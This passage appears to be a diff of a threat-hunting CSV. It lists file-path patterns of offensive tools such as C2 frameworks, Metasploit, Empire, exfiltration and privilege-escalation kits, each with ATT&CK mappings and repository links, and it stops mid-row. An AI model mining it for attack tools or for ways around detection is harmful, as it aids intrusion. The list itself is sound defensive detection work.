-"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*/payload2.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*/pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PDF_Payload/script.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/PE/InjectPE.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/pe2shc.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" -"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" -"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" -"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*/PeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PE-Obfuscator*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*/perf_swevent64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/persist.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*/Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Persistence/InstallUtil.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/persistence2.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*/peterspbr/dirty-pipe-otw*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" -"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation 